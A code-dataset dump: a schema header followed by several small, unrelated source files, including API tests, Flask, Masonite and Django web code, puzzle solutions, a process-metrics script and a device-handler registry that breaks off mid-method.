hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
da2b0d4562489488864ba4de9fb762d95ecb2356
970
py
Python
tests/functional/test_get_vehicles.py
vyahello/fake-cars-api
13c7325a7d8779d4b2e5ce60d5664b843c891cb6
[ "MIT" ]
null
null
null
tests/functional/test_get_vehicles.py
vyahello/fake-cars-api
13c7325a7d8779d4b2e5ce60d5664b843c891cb6
[ "MIT" ]
3
2019-11-22T20:56:17.000Z
2021-09-15T08:18:30.000Z
tests/functional/test_get_vehicles.py
vyahello/fake-vehicles-api
13c7325a7d8779d4b2e5ce60d5664b843c891cb6
[ "MIT" ]
null
null
null
import requests import pytest from apistar import TestClient from api.web.support import Status from tests.markers import smoke @pytest.fixture(scope="module") def response(client: TestClient) -> requests.Response: return client.get("/api") @smoke def test_get_vehicles_status(response: requests.Response) -> None: assert response.status_code == Status.SUCCESS.code @smoke def test_vehicles_count(response: requests.Response) -> None: assert len(response.json()) == 1000 @smoke def test_vehicles_is_list(response: requests.Response) -> None: assert type(response.json()) is list @smoke def test_get_first_vehicle(response: requests.Response) -> None: assert response.json()[0] == { "id_": 1, "manufacturer": "Mazda", "model": "RX-8", "year": 2006, "vin": "JTJBARBZ2F2356837", } @smoke def test_last_vehicle_id(response: requests.Response) -> None: assert response.json()[-1]["id_"] == 1000
23.095238
66
0.697938
121
970
5.454545
0.404959
0.145455
0.090909
0.212121
0.306061
0.20303
0.139394
0
0
0
0
0.029814
0.170103
970
41
67
23.658537
0.790062
0
0
0.172414
0
0
0.068041
0
0
0
0
0
0.172414
1
0.206897
false
0
0.172414
0.034483
0.413793
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
2
da357111c28536ab8eed4063bcc9a095711453cc
747
py
Python
rosalindLibrary/programs/fib.py
aevear/RosalindProject
494dcf3ccfcc8047cc472dd7ca012bca45c0ebe2
[ "MIT" ]
1
2021-01-20T02:00:21.000Z
2021-01-20T02:00:21.000Z
rosalindLibrary/programs/fib.py
aevear/RosalindProject
494dcf3ccfcc8047cc472dd7ca012bca45c0ebe2
[ "MIT" ]
null
null
null
rosalindLibrary/programs/fib.py
aevear/RosalindProject
494dcf3ccfcc8047cc472dd7ca012bca45c0ebe2
[ "MIT" ]
null
null
null
#------------------------------------------------------------------------------- # mrna #------------------------------------------------------------------------------- def runFib(inputFile): fi = open(inputFile, 'r') #reads in the file that list the before/after file names inputData = fi.readline().split() #reads in files n, m = int(inputData[0]), int(inputData[1]) mature, immature = 0, 1 for i in range(n-1): babies = mature * m mature = immature + mature immature = babies total = mature + immature return total #------------------------------------------------------------------------------- # Fin #-------------------------------------------------------------------------------
32.478261
86
0.342704
58
747
4.413793
0.586207
0.21875
0
0
0
0
0
0
0
0
0
0.008039
0.167336
747
22
87
33.954545
0.403537
0.527443
0
0
0
0
0.002899
0
0
0
0
0
0
1
0.090909
false
0
0
0
0.181818
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
da3c8d5401dfee9fd9d89f39c39af9a102ae502a
2,446
py
Python
tester-webserv/PythonTester/src/testcase_generation/Response/media_type.py
aprilmayjune135/42_web_server
46bc46dd6a0008119842e3848d4fe57fcd84526b
[ "MIT" ]
2
2022-01-04T13:07:46.000Z
2022-01-04T13:08:50.000Z
tester-webserv/PythonTester/src/testcase_generation/Response/media_type.py
aprilmayjune135/web-server
46bc46dd6a0008119842e3848d4fe57fcd84526b
[ "MIT" ]
3
2021-09-27T08:35:34.000Z
2021-11-25T09:49:52.000Z
tester-webserv/PythonTester/src/testcase_generation/Response/media_type.py
aprilmayjune135/web-server
46bc46dd6a0008119842e3848d4fe57fcd84526b
[ "MIT" ]
2
2021-11-17T20:26:55.000Z
2021-12-22T21:54:24.000Z
import TestCase from testcase_generation.Response.default import defaultTestCase import Constants def defaultMediaTypeTestCase(): testcase = defaultTestCase() # Request testcase.request.method = 'GET' # Response testcase.response.status_code = 200 testcase.response.expect_body = True return testcase def testCaseMediaType_html(): testcase = defaultMediaTypeTestCase() testcase.name = 'MediaType_html' testcase.request.target = '/MediaType/sample.html' testcase.response.headers['Content-Type'] = 'text/html' with open(Constants.SERVER_ROOT + '/Method/MediaType/sample.html', 'rb') as f: testcase.response.body = f.read() testcase.response.headers['content-length'] = str(len(testcase.response.body)) return testcase def testCaseMediaType_txt(): testcase = defaultMediaTypeTestCase() testcase.name = 'MediaType_txt' testcase.request.target = '/MediaType/sample.txt' testcase.response.headers['Content-Type'] = 'text/plain;charset=UTF-8' with open(Constants.SERVER_ROOT + '/Method/MediaType/sample.txt', 'rb') as f: testcase.response.body = f.read() testcase.response.headers['content-length'] = str(len(testcase.response.body)) return testcase def testCaseMediaType_png(): testcase = defaultMediaTypeTestCase() testcase.name = 'MediaType_png' testcase.request.target = '/MediaType/sample.png' testcase.response.headers['Content-Type'] = 'image/png' with open(Constants.SERVER_ROOT + '/Method/MediaType/sample.png', 'rb') as f: testcase.response.body = f.read() testcase.response.headers['content-length'] = str(len(testcase.response.body)) return testcase def testCaseMediaType_jpeg(): testcase = defaultMediaTypeTestCase() testcase.name = 'MediaType_png' testcase.request.target = '/MediaType/sample.jpeg' testcase.response.headers['Content-Type'] = 'image/jpeg' with open(Constants.SERVER_ROOT + '/Method/MediaType/sample.jpeg', 'rb') as f: testcase.response.body = f.read() testcase.response.headers['content-length'] = str(len(testcase.response.body)) return testcase def testCaseMediaType_sh(): testcase = defaultMediaTypeTestCase() testcase.name = 'MediaType_sh' testcase.request.target = '/MediaType/sample.sh' testcase.response.headers['Content-Type'] = 'application/x-sh' with open(Constants.SERVER_ROOT + '/Method/MediaType/sample.sh', 'rb') as f: testcase.response.body = f.read() testcase.response.headers['content-length'] = str(len(testcase.response.body)) return testcase
38.825397
79
0.766149
292
2,446
6.356164
0.178082
0.189655
0.123922
0.161638
0.802263
0.640086
0.557112
0.557112
0.427802
0.427802
0
0.001807
0.094849
2,446
62
80
39.451613
0.836495
0.006541
0
0.425926
0
0
0.215492
0.10342
0
0
0
0
0
1
0.111111
false
0
0.055556
0
0.277778
0
0
0
0
null
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
da3f1f4cde5731fedeac0f7e5d94ec5f66cd184a
158
py
Python
hackerrank/Python/Min and Max/solution.py
ATrain951/01.python-com_Qproject
c164dd093954d006538020bdf2e59e716b24d67c
[ "MIT" ]
4
2020-07-24T01:59:50.000Z
2021-07-24T15:14:08.000Z
hackerrank/Python/Min and Max/solution.py
ATrain951/01.python-com_Qproject
c164dd093954d006538020bdf2e59e716b24d67c
[ "MIT" ]
null
null
null
hackerrank/Python/Min and Max/solution.py
ATrain951/01.python-com_Qproject
c164dd093954d006538020bdf2e59e716b24d67c
[ "MIT" ]
null
null
null
import numpy n, m = map(int, input().split()) a = numpy.array([input().split() for _ in range(n)], dtype=int) print(numpy.max(numpy.min(a, axis=1), axis=0))
26.333333
63
0.64557
29
158
3.482759
0.689655
0.19802
0
0
0
0
0
0
0
0
0
0.014388
0.120253
158
5
64
31.6
0.71223
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0.25
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
da466d1a320ccba5632829b19d644b45e51663c0
314
py
Python
util/data_type_util.py
Chandru01061997/pythonDB
fc164bdc921fd42af316f034433fbc27bacfd24c
[ "Apache-2.0" ]
409
2020-07-01T14:10:50.000Z
2022-02-25T03:10:26.000Z
util/data_type_util.py
Chandru01061997/pythonDB
fc164bdc921fd42af316f034433fbc27bacfd24c
[ "Apache-2.0" ]
14
2020-07-03T23:09:49.000Z
2020-10-07T12:37:12.000Z
util/data_type_util.py
Chandru01061997/pythonDB
fc164bdc921fd42af316f034433fbc27bacfd24c
[ "Apache-2.0" ]
303
2020-07-01T14:08:53.000Z
2022-03-08T17:59:34.000Z
from uuid import UUID from datetime import datetime def uuid_from_string(string): return UUID('{s}'.format(s=string)) def format_timestamp(string): if isinstance(string, str): return datetime.strptime(string, '%Y-%m-%dT%H:%M:%S.%fZ') if isinstance(string, datetime): return string
20.933333
65
0.681529
44
314
4.795455
0.431818
0.075829
0.170616
0
0
0
0
0
0
0
0
0
0.184713
314
14
66
22.428571
0.824219
0
0
0
0
0
0.076433
0.066879
0
0
0
0
0
1
0.222222
false
0
0.222222
0.111111
0.777778
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
da4ed74782f85b5d5a5f393709c19e30745e1f4b
1,259
py
Python
theoneapi_sdk/movie/movie.py
eliram/LotR-Eliram-SDK
b3ae064367d30d4d2ef6ec503125e3aa5106b0d7
[ "Apache-2.0" ]
null
null
null
theoneapi_sdk/movie/movie.py
eliram/LotR-Eliram-SDK
b3ae064367d30d4d2ef6ec503125e3aa5106b0d7
[ "Apache-2.0" ]
null
null
null
theoneapi_sdk/movie/movie.py
eliram/LotR-Eliram-SDK
b3ae064367d30d4d2ef6ec503125e3aa5106b0d7
[ "Apache-2.0" ]
null
null
null
"""Handle the movie endpoint.""" from typing import TYPE_CHECKING, List from theoneapi_sdk.movie.movie_dataclass import MovieData, MovieList from theoneapi_sdk.quote.quote_dataclass import QuotesList if TYPE_CHECKING: from theoneapi_sdk.request_handler import RequestHandler from theoneapi_sdk.filter import Filter class Movie: """Handle the movie endpoint.""" def __init__(self, request_handler: "RequestHandler"): self._request_handler = request_handler def list(self, page: int = 1, limit: int = 100, filters: List["Filter"] = [], **kwargs) -> "MovieList": """Get a list of quotes. """ return MovieList(self._request_handler._get(f"movie?page={page}&limit={limit}", filters=filters, **kwargs)) def movie(self, movie_id: int) -> MovieData: """Get a movie by id. """ return MovieData(self._request_handler._get(f"movie/{movie_id}")["docs"][0]) def movie_quotes(self, movie_id: int, page: int = 1, limit: int = 100, filters: List["Filter"] = [], **kwargs) -> "QuotesList": """Get a list of quotes for a movie. """ return QuotesList(self._request_handler._get(f"movie/{movie_id}/quote?page={page}&limit={limit}", filters=filters, **kwargs))
40.612903
133
0.675139
162
1,259
5.055556
0.271605
0.119658
0.10989
0.076923
0.350427
0.311355
0.278388
0.185592
0.102564
0.102564
0
0.008772
0.185068
1,259
30
134
41.966667
0.789474
0.123114
0
0
0
0
0.133581
0.073284
0
0
0
0
0
1
0.266667
false
0
0.333333
0
0.866667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
0
0
0
2
da5b39150b74efcfc4f695de69dc90531942a1d9
360
py
Python
app/__init__.py
simplg/Object-Detection-Flask-TF-VanillaJS
0ab9b341b998fd49f277af742aa62b60fdf86735
[ "MIT" ]
null
null
null
app/__init__.py
simplg/Object-Detection-Flask-TF-VanillaJS
0ab9b341b998fd49f277af742aa62b60fdf86735
[ "MIT" ]
null
null
null
app/__init__.py
simplg/Object-Detection-Flask-TF-VanillaJS
0ab9b341b998fd49f277af742aa62b60fdf86735
[ "MIT" ]
null
null
null
from flask import Flask from app.services import model_manager from app.controllers.api_blueprint import api_router from app.controllers.main_blueprint import main_router def create_app(test_config=None): app = Flask(__name__) model_manager.init_app(app) app.register_blueprint(api_router) app.register_blueprint(main_router) return app
25.714286
54
0.805556
52
360
5.25
0.403846
0.076923
0.131868
0
0
0
0
0
0
0
0
0
0.136111
360
14
55
25.714286
0.877814
0
0
0
0
0
0
0
0
0
0
0
0
1
0.1
false
0
0.4
0
0.6
0.4
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
da70807eb2e1dbd92d65c49dd5a4de5681a83229
1,161
py
Python
routes/web.py
erikwestlund/zuhanden
635004bc310235d10379c2811e42f121da14845f
[ "MIT" ]
3
2019-10-30T18:31:23.000Z
2020-03-11T05:00:44.000Z
routes/web.py
erikwestlund/zuhanden
635004bc310235d10379c2811e42f121da14845f
[ "MIT" ]
6
2021-03-09T21:14:05.000Z
2022-02-26T19:24:45.000Z
routes/web.py
erikwestlund/zuhanden
635004bc310235d10379c2811e42f121da14845f
[ "MIT" ]
null
null
null
"""Web Routes.""" from masonite.routes import Get, Post ROUTES = [Get("/", "IndexController@show").name("index")] ROUTES = ROUTES + [ Get().route("/users/sign-in", "SignInController@show").name("sign_in"), Post().route("/users/sign-in", "SignInController@sign_in"), Get().route("/users/sign-out", "SignInController@sign_out").name("sign_out"), Get().route("/users/sign-up", "SignUpController@show").name("sign_up"), Post().route("/users/sign-up", "SignUpController@store"), Get() .route("/users/verify-email", "VerifyEmailController@verify_show") .name("verify"), Get().route("/users/verify-email/send", "VerifyEmailController@send_verify_email"), Get().route( "/users/verify-email/@id:signed", "VerifyEmailController@confirm_email" ), Get() .route("/users/reset-password", "PasswordController@reset_form") .name("forgot.password"), Post().route("/users/reset-password", "PasswordController@send"), Get() .route("/users/reset-password/@token", "PasswordController@reset") .name("password.reset"), Post().route("/users/reset-password/@token", "PasswordController@update"), ]
40.034483
87
0.667528
129
1,161
5.930233
0.263566
0.156863
0.135948
0.120261
0.50719
0.120261
0
0
0
0
0
0
0.11714
1,161
28
88
41.464286
0.746341
0.009475
0
0.125
0
0
0.564685
0.413462
0
0
0
0
0
1
0
false
0.25
0.041667
0
0.041667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
e511c6ab80ef1771a595dc11f1c4f7c408d02fd1
847
py
Python
code/api/Monitor/newUser_backend.py
RandyCamacho/SeniorDesign-HomeCU
f862c453b0454838d662688fba88e95412d0229e
[ "MIT" ]
null
null
null
code/api/Monitor/newUser_backend.py
RandyCamacho/SeniorDesign-HomeCU
f862c453b0454838d662688fba88e95412d0229e
[ "MIT" ]
null
null
null
code/api/Monitor/newUser_backend.py
RandyCamacho/SeniorDesign-HomeCU
f862c453b0454838d662688fba88e95412d0229e
[ "MIT" ]
null
null
null
from django.contrib.auth.backends import BaseBackend from django.contrib.auth.hashers import check_password from .models import BsuOfficeusers class newUserBackend(BaseBackend): def checkusername(self, username=None): try: user = BsuOfficeusers.objects.get(user_name=username) return 1 except BsuOfficeusers.DoesNotExist: return None def checkemail(self, email=None): try: user = BsuOfficeusers.objects.get(email=email) except BsuOfficeusers.DoesNotExist: return None def addCustomer(self, email=None, username=None, password=None): try: BsuOfficeusers.objects.create_user(username=username, password=password) except: return None def addStaff(self, email=None, username=None, password=None): try: BsuOfficeusers.objects.create_superuser(username=username, passwd=password) except: return None
26.46875
78
0.779221
101
847
6.49505
0.346535
0.042683
0.059451
0.064024
0.448171
0.448171
0.204268
0.204268
0.204268
0.204268
0
0.001362
0.133412
847
31
79
27.322581
0.892371
0
0
0.48
0
0
0
0
0
0
0
0
0
1
0.16
false
0.2
0.12
0
0.52
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
e516dc00b8ae9fe3e8b9e99903e96f46b24dbaf6
189
py
Python
par ou impar.py
Azultropico/exercicios_python
02dc118d0330673a0d961b8ff48eb0acd1e81aea
[ "Apache-2.0" ]
null
null
null
par ou impar.py
Azultropico/exercicios_python
02dc118d0330673a0d961b8ff48eb0acd1e81aea
[ "Apache-2.0" ]
null
null
null
par ou impar.py
Azultropico/exercicios_python
02dc118d0330673a0d961b8ff48eb0acd1e81aea
[ "Apache-2.0" ]
null
null
null
n1 = int(input("Digite um número: ")) if __name__ == '__main__': if n1 % 2 == 0: print("Número Par") elif n1 % 2 == 1: print("Número Ímpar") else: print("Valor Inválido")
21
37
0.571429
27
189
3.703704
0.703704
0.06
0
0
0
0
0
0
0
0
0
0.049296
0.248677
189
9
38
21
0.65493
0
0
0
0
0
0.326316
0
0
0
0
0
0
1
0
false
0
0
0
0
0.375
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e523fccfcc84e837a16106964d13dc172e1fbf92
205
py
Python
maps/bboxes.py
CharlesRethman/HEA-Baselines-ZA-2015-Oct
e8689576a8ec682af3f7714d7bfb3609eadbff19
[ "MIT" ]
null
null
null
maps/bboxes.py
CharlesRethman/HEA-Baselines-ZA-2015-Oct
e8689576a8ec682af3f7714d7bfb3609eadbff19
[ "MIT" ]
null
null
null
maps/bboxes.py
CharlesRethman/HEA-Baselines-ZA-2015-Oct
e8689576a8ec682af3f7714d7bfb3609eadbff19
[ "MIT" ]
null
null
null
l = iface.activeLayer() iter = l.getFeatures() geoms = [] for feature in iter: geom = feature.geometry() if not(geom.isMultipart()): l.boundingBox(feature.id()) geoms.append(geom)
22.777778
35
0.629268
25
205
5.16
0.68
0
0
0
0
0
0
0
0
0
0
0
0.219512
205
9
36
22.777778
0.80625
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e52a791dd7cf06539d84f8c0ef6bb28561fd022f
2,417
py
Python
lib/sysusage.py
Tormir/Beats
b1556c762725a50ac7a5acc9b993bc344bd669b3
[ "Apache-2.0" ]
null
null
null
lib/sysusage.py
Tormir/Beats
b1556c762725a50ac7a5acc9b993bc344bd669b3
[ "Apache-2.0" ]
null
null
null
lib/sysusage.py
Tormir/Beats
b1556c762725a50ac7a5acc9b993bc344bd669b3
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python3.6 import os, subprocess, json, argparse def Parser(): parser = argparse.ArgumentParser(description='Process metrix from system') parser.add_argument('-C', metavar='Command', type=str, help='Command which process started, delimiter is ":::", e.g. command:command', required=True) return parser.parse_args() def Windows() : return None def Linux() : parser = Parser() command = parser.C.split(":::") data = {} CommandData = {} proces = subprocess.run(['ps', 'aux'], stdout=subprocess.PIPE).stdout.decode("utf-8").splitlines() for x in range(len(json.loads(json.dumps(proces)))): data[' '.join(json.loads(json.dumps(proces))[x].split()[10:])] = '{"USER":"' + json.loads(json.dumps(proces))[x].split()[0] + '"' + \ ', "PID":' + json.loads(json.dumps(proces))[x].split()[1] + \ ', "CPU":' + json.loads(json.dumps(proces))[x].split()[2] + \ ', "MEM":' + json.loads(json.dumps(proces))[x].split()[3] + \ ', "VSZ":' + json.loads(json.dumps(proces))[x].split()[4] + \ ', "RSS":' + json.loads(json.dumps(proces))[x].split()[5] + \ ', "TTY":"' + json.loads(json.dumps(proces))[x].split()[6] + '"' + \ ', "STAT":"' + json.loads(json.dumps(proces))[x].split()[7] + '"' + \ ', "START":"' + json.loads(json.dumps(proces))[x].split()[8] + '"' + \ ', "TIME":"' + json.loads(json.dumps(proces))[x].split()[9] + '"' + \ ', "COMMAND":"' + ' '.join(json.loads(json.dumps(proces))[x].split()[10:]) + '"' + \ '}' with open('lib/metrics.json', 'w') as f: for i in command: f.write(data.get(i) + '\n') if __name__ == '__main__': Linux()
60.425
157
0.386016
213
2,417
4.333333
0.43662
0.126761
0.183099
0.253521
0.429036
0.403034
0.403034
0.078007
0.078007
0
0
0.012373
0.431527
2,417
39
158
61.974359
0.659389
0.007861
0
0
0
0
0.107217
0
0
0
0
0
0
1
0.096774
false
0
0.032258
0.032258
0.193548
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e53ffa8559a6302d0825134979cfdab0f28e4630
477
py
Python
backend/examples/admin.py
daobook/doccano
45122687740f74f19e2578c5cf28507f0839bf16
[ "MIT" ]
2
2021-12-11T22:25:27.000Z
2021-12-20T01:02:16.000Z
backend/examples/admin.py
daobook/doccano
45122687740f74f19e2578c5cf28507f0839bf16
[ "MIT" ]
1
2022-02-15T10:50:18.000Z
2022-02-15T10:50:18.000Z
backend/examples/admin.py
daobook/doccano
45122687740f74f19e2578c5cf28507f0839bf16
[ "MIT" ]
null
null
null
from django.contrib import admin from .models import Example, Comment class ExampleAdmin(admin.ModelAdmin): list_display = ('text', 'project', 'meta') ordering = ('project',) search_fields = ('text',) class CommentAdmin(admin.ModelAdmin): list_display = ('user', 'example', 'text', 'created_at', ) ordering = ('user', 'created_at', ) search_fields = ('user',) admin.site.register(Example, ExampleAdmin) admin.site.register(Comment, CommentAdmin)
23.85
62
0.689727
52
477
6.211538
0.480769
0.105263
0.117647
0.160991
0
0
0
0
0
0
0
0
0.155136
477
19
63
25.105263
0.801489
0
0
0
0
0
0.144654
0
0
0
0
0
0
1
0
false
0
0.166667
0
0.833333
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
e54c28e31b4b4c56e93933ccf0dd21e1a1a1a372
815
py
Python
tartiflette/language/ast/base.py
remorses/tartiflette-whl
92bed13de130a7a88278d7019314135e01281259
[ "MIT" ]
530
2019-06-04T11:45:36.000Z
2022-03-31T09:29:56.000Z
tartiflette/language/ast/base.py
remorses/tartiflette-whl
92bed13de130a7a88278d7019314135e01281259
[ "MIT" ]
242
2019-06-04T11:53:08.000Z
2022-03-28T07:06:27.000Z
tartiflette/language/ast/base.py
remorses/tartiflette-whl
92bed13de130a7a88278d7019314135e01281259
[ "MIT" ]
36
2019-06-21T06:40:27.000Z
2021-11-04T13:11:16.000Z
__all__ = ( "Node", "DefinitionNode", "ExecutableDefinitionNode", "TypeSystemDefinitionNode", "TypeSystemExtensionNode", "TypeDefinitionNode", "TypeExtensionNode", "SelectionNode", "ValueNode", "TypeNode", ) class Node: __slots__ = () class DefinitionNode(Node): __slots__ = () class ExecutableDefinitionNode(DefinitionNode): __slots__ = () class TypeSystemDefinitionNode(DefinitionNode): __slots__ = () class TypeSystemExtensionNode(DefinitionNode): __slots__ = () class TypeDefinitionNode(TypeSystemDefinitionNode): __slots__ = () class TypeExtensionNode(TypeSystemExtensionNode): __slots__ = () class SelectionNode(Node): __slots__ = () class ValueNode(Node): __slots__ = () class TypeNode(Node): __slots__ = ()
15.377358
51
0.687117
50
815
10.32
0.26
0.174419
0.108527
0
0
0
0
0
0
0
0
0
0.201227
815
52
52
15.673077
0.792627
0
0
0.3125
0
0
0.188957
0.087117
0
0
0
0
0
1
0
false
0
0
0
0.625
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
e55b00333f1d03a1830681b90bdf11aebe0e4245
6,286
py
Python
energenie/Handlers/__init__.py
klattimer/pyenergenie
1677bd2ac2bda9d0cd6960b5fb537a2d097eda4e
[ "MIT" ]
null
null
null
energenie/Handlers/__init__.py
klattimer/pyenergenie
1677bd2ac2bda9d0cd6960b5fb537a2d097eda4e
[ "MIT" ]
15
2020-03-22T13:55:00.000Z
2021-12-14T09:07:56.000Z
energenie/Handlers/__init__.py
klattimer/pyenergenie
1677bd2ac2bda9d0cd6960b5fb537a2d097eda4e
[ "MIT" ]
null
null
null
import os import importlib, inspect import logging from ..Config import Config class Handler: _protocol = None _description = None _args = {} @classmethod def describe(cls): return { 'protocol': cls.protocol, 'description': cls.description, 'args': cls.args } def __init__(self, **kw_args): self.name = kw_args.get('name') self.enabled = kw_args.get('enabled') self.config = Config.singleton() def serialise(self): return { 'type': self.__class__.__name__, 'name': self.name, 'enabled': self.enabled } def ask(self): pass def destroy(self): pass def device_detected(self, device): pass def device_added(self, device): pass def device_removed(self, device): pass def set(self, device, key, value): # Lookup the device, and set the key to value pass def handle_reading(self, device, key, value): pass def handle_unknown(self, address, message): pass def alarm(self, device, key, value, alarm_reason): pass class HandlerFactory: __single = None @classmethod def singleton(cls): if cls.__single is None: cls.__single = cls() return cls.__single @classmethod def keys(cls): return list(cls.singleton().handlers.keys()) def __init__(self): self.handlers = {} p = os.path.dirname(os.path.abspath(__file__)) files = os.listdir(p) for f in files: if f.startswith("__"): continue if not f.endswith(".py"): continue m = f.replace('.py', '') try: module = importlib.import_module('.' + m, 'energenie.Handlers') except: logging.exeption("Module import failed: " + m) continue for name, obj in inspect.getmembers(module): try: if not inspect.isclass(obj): continue if not issubclass(obj, Handler): continue if name == "Handler": continue plugin = getattr(module, name) if name in self.handlers.keys(): logging.debug("Plugin already registered %s" % name) continue self.handlers[name] = plugin logging.info("Plugin loaded \"%s\"" % name) except: logging.exception("Plugin failed to load: \"%s\"" % name) def __getitem__(self, k): return self.handlers[k] class HandlerRegistry: __single = None @classmethod def singleton(cls): if cls.__single is None: cls.__single = cls() return cls.__single @classmethod def alarm(cls, device, key, value, alarm_reason): cls.singleton()._alarm(device, key, value, alarm_reason) @classmethod def handle_reading(cls, device, key, value): 